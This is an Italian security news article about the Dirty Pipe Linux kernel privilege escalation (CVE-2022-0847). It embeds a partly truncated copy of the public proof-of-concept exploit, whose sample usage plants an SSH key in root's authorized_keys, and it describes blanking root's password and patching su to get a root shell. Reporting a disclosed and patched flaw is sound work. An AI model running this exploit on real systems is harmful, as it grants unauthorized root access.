Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Cerca
Red Hot Cyber Academy

Linux: Dopo Dirty Cow ecco Dirty Pipe. Una nuova privilege escalation.

Redazione RHC : 7 Marzo 2022 23:49

Una nuova vulnerabilità di Linux nota come “Dirty Pipe” consente agli utenti locali di ottenere i privilegi di root tramite un exploit disponibili pubblicamente.

Il ricercatore di sicurezza Max Kellermann ha rivelato responsabilmente la vulnerabilità “Dirty Pipe” e ha affermato che colpisce il kernel Linux 5.8 e versioni successive, anche su dispositivi Android.

La vulnerabilità è stata divulgata responsabilmente a vari manutentori Linux a partire dal 20 febbraio 2022, inclusi il team di sicurezza del kernel Linux e il team di sicurezza Android.


Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?
Stiamo per avviare il corso intermedio in modalità "Live Class", previsto per febbraio.
A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente.
Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato. Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile.

Contattaci tramite WhatsApp al 375 593 1011 per richiedere ulteriori informazioni oppure scriviti alla casella di posta [email protected]



Supporta RHC attraverso:
  • L'acquisto del fumetto sul Cybersecurity Awareness
  • Ascoltando i nostri Podcast
  • Seguendo RHC su WhatsApp
  • Seguendo RHC su Telegram
  • Scarica gratuitamente "Dark Mirror", il report sul ransomware di Dark Lab


  • Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.


    Sebbene il bug sia stato corretto nei kernel Linux 5.16.11, 5.15.25 e 5.10.102, molti server continuano a eseguire kernel obsoleti, rendendo il rilascio di questo exploit un problema significativo per gli amministratori di server.

    La vulnerabilità viene rilevata come CVE-2022-0847 e consente a un utente non privilegiato di iniettare e sovrascrivere dati in file di sola lettura, inclusi i processi SUID eseguiti come root.

    Kellerman ha scoperto il bug dopo aver rintracciato un bug che stava danneggiando i registri di accesso al server Web per uno dei suoi clienti.

    Kellerman afferma che la vulnerabilità è simile alla  vulnerabilità Dirty COW  (CVE-2016-5195) risolta nel 2016.

    Come parte della divulgazione di Dirty Pipe , Kellerman ha rilasciato un exploit proof-of-concept (PoC) che consente agli utenti locali di inserire i propri dati in file sensibili di sola lettura, rimuovendo le restrizioni o modificando le configurazioni per fornire un accesso maggiore di quello che avrebbero normalmente.

    /* SPDX-License-Identifier: GPL-2.0 */
    /*
     * Copyright 2022 CM4all GmbH / IONOS SE
     *
     * author: Max Kellermann 
     *
     * Proof-of-concept exploit for the Dirty Pipe
     * vulnerability (CVE-2022-0847) caused by an uninitialized
     * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
     * file contents in the page cache, even if the file is not permitted
     * to be written, immutable or on a read-only mount.
     *
     * This exploit requires Linux 5.8 or later; the code path was made
     * reachable by commit f6dd975583bd ("pipe: merge
     * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
     * there before, it just provided an easy way to exploit it.
     *
     * There are two major limitations of this exploit: the offset cannot
     * be on a page boundary (it needs to write one byte before the offset
     * to add a reference to this page to the pipe), and the write cannot
     * cross a page boundary.
     *
     * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
     *
     * Further explanation: https://dirtypipe.cm4all.com/
     */
    
    #define _GNU_SOURCE
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    #include 
    
    #ifndef PAGE_SIZE
    #define PAGE_SIZE 4096
    #endif
    
    /**
     * Create a pipe where all "bufs" on the pipe_inode_info ring have the
     * PIPE_BUF_FLAG_CAN_MERGE flag set.
     */
    static void prepare_pipe(int p[2])
    {
    	if (pipe(p)) abort();
    
    	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    	static char buffer[4096];
    
    	/* fill the pipe completely; each pipe_buffer will now have
    	   the PIPE_BUF_FLAG_CAN_MERGE flag */
    	for (unsigned r = pipe_size; r > 0;) {
    		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    		write(p[1], buffer, n);
    		r -= n;
    	}
    
    	/* drain the pipe, freeing all pipe_buffer instances (but
    	   leaving the flags initialized) */
    	for (unsigned r = pipe_size; r > 0;) {
    		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    		read(p[0], buffer, n);
    		r -= n;
    	}
    
    	/* the pipe is now empty, and if somebody adds a new
    	   pipe_buffer without initializing its "flags", the buffer
    	   will be mergeable */
    }
    
    int main(int argc, char **argv)
    {
    	if (argc != 4) {
    		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
    		return EXIT_FAILURE;
    	}
    
    	/* dumb command-line argument parser */
    	const char *const path = argv[1];
    	loff_t offset = strtoul(argv[2], NULL, 0);
    	const char *const data = argv[3];
    	const size_t data_size = strlen(data);
    
    	if (offset % PAGE_SIZE == 0) {
    		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
    		return EXIT_FAILURE;
    	}
    
    	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    	const loff_t end_offset = offset + (loff_t)data_size;
    	if (end_offset > next_page) {
    		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
    		return EXIT_FAILURE;
    	}
    
    	/* open the input file and validate the specified offset */
    	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    	if (fd  st.st_size) {
    		fprintf(stderr, "Offset is not inside the file\n");
    		return EXIT_FAILURE;
    	}
    
    	if (end_offset > st.st_size) {
    		fprintf(stderr, "Sorry, cannot enlarge the file\n");
    		return EXIT_FAILURE;
    	}
    
    	/* create the pipe with all flags initialized with
    	   PIPE_BUF_FLAG_CAN_MERGE */
    	int p[2];
    	prepare_pipe(p);
    
    	/* splice one byte from before the specified offset into the
    	   pipe; this will add a reference to the page cache, but
    	   since copy_page_to_iter_pipe() does not initialize the
    	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    	--offset;
    	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    	if (nbytes 

    Ad esempio, il ricercatore di sicurezza Phith0n ha  illustrato come utilizzare l’exploit per modificare il file /etc/passwd in modo che l’utente root non abbia una password. 

    Demonstration of the CVE-2016-5195 DirtyPipe vulnerability
    Esempio di lancio dell’exploit (fonte BleepingComputer)

    Una volta eseguita questa modifica, l’utente non privilegiato può semplicemente eseguire il comando “su root” per ottenere l’accesso all’account root

    Tuttavia, oggi è stato rilasciato pubblicamente anche un exploit aggiornato dal ricercatore di sicurezza BLASTY  che rende ancora più facile ottenere i privilegi di root applicando una patch al comando /usr/bin/su per rilasciare una shell di root in /tmp/sh e quindi e lo script.

    Redazione
    La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

    Lista degli articoli

    Articoli in evidenza

    Non trovi la tua Tesla? Nessun problema: c’è Free TeslaMate
    Di Redazione RHC - 18/08/2025

    Un ricercatore esperto in sicurezza informatica ha scoperto che centinaia di server TeslaMate in tutto il mondo trasmettono apertamente i dati dei veicoli Tesla senza alcuna protezione. Ciò signi...

    Il progetto Dojo di Tesla è morto. Una scommessa tecnologica finita in clamoroso fiasco
    Di Redazione RHC - 18/08/2025

    Il 23 luglio 2025, Tesla tenne la sua conference call sui risultati del secondo trimestre. Elon Musk , come di consueto, trasmise a Wall Street il suo contagioso ottimismo. Parlando di Dojo, il superc...

    RIP Microsoft PowerShell 2.0! Tra Agosto e Settembre la fine di un’era
    Di Redazione RHC - 18/08/2025

    Microsoft rimuoverà PowerShell 2.0 da Windows a partire da agosto, anni dopo averne annunciato la dismissione e averlo mantenuto come funzionalità opzionale. Il processore dei comandi vecchi...

    SQLite, Nginx e Apache crollano in un giorno. Hacker e Agenti AI rivoluzioneranno il bug hunting?
    Di Redazione RHC - 17/08/2025

    Sviluppare agenti di intelligenza artificiale in grado di individuare vulnerabilità in sistemi complessi è ancora un compito impegnativo che richiede molto lavoro manuale. Tuttavia, tali age...

    Arriva il primo UTERO ROBOTICO al mondo: un androide partorirà bambini entro il 2026?
    Di Redazione RHC - 17/08/2025

    L’azienda cinese Kaiwa Technology, con sede a Guangzhou, ha annunciato l’intenzione di creare il primo “utero robotico” al mondo entro il 2026: una macchina umanoide con un...